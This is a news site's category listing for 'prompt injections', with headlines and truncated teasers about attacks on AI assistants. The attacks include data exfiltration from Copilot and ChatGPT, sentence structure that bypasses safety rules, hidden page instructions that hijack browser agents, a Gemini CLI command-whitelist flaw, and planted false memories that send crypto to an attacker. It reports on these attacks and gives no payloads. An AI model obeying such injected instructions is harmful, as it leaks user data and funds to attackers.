Microsoft has fixed a vulnerability in its Copilot AI assistant that allowed hackers to pluck a host of sensitive user […]
Category: prompt injections
ChatGPT falls to new data-pilfering attack as a vicious cycle in AI continues
To block the attack, OpenAI restricted ChatGPT to solely open URLs exactly as provided and refuse to add parameters to […]
Syntax hacking: Researchers discover sentence structure can bypass AI safety rules
Adventures in pattern-matching New research offers clues about why some prompt injection attacks may succeed. Researchers from MIT, Northeastern University, […]
Claude’s new AI file creation feature ships with deep security risks built in
Independent AI researcher Simon Willison, reviewing the feature today on his blog, noted that Anthropic’s advice to “monitor Claude while […]
New AI browser agents create risks if sites hijack them with hidden instructions
The company tested 123 cases representing 29 different attack scenarios and found a 23.6 percent attack success rate when browser […]
Flaw in Gemini CLI coding tool could allow hackers to run nasty commands
“At no stage is any subsequent element of the command string after the first ‘grep’ compared to a whitelist,” Cox […]
New attack can steal cryptocurrency by planting false memories in AI chatbots
Skip to content Malicious “context manipulation” technique causes bot to send payments to attacker’s wallet. Imagine a world where AI-powered […]
Researchers claim breakthrough in fight against AI’s frustrating security hole
99% detection is a failing grade Prompt injections are the Achilles’ heel of AI assistants. Google offers a potential fix. […]
Gemini hackers can deliver more potent attacks with a helping hand from… Gemini
MORE FUN(-TUNING) IN THE NEW WORLD Hacking LLMs has always been more art than science. A new attack on Gemini […]
